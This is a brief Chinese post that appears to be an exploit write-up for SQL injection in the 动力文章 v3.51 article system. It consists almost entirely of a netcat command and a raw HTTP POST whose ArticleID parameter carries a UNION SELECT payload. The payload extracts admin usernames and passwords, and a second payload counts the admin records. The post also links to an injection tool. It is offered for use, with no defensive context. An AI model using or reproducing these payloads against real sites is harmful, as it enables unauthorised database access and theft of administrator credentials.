c:\>nc www.site.com 80<send.txt
//send.txt
POST /Article_Print.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Microsoft URL Control - 6.01.9782
Host: www.site.com
Content-Length: 277
Cache-Control: no-cache
ArticleID=1000%20union%20(select%20top%201%201,1,'user:'%2busername%2bchr(124),'pass:'%2bpassword%2bchr(124),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20(select%20top%201%20username,password%20from%20admin%20order%20by%20username)%20order%20by%20username%20desc)
相关工具:动力文章v3.51注入程序(http://www.3800hk.com/Soft/zhly/18573.html)
查admin表记录数量,POST如下
ArticleID=1000%20union%20(select%20top%201%201,1,1,count(*),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20admin)
没有评论:
发表评论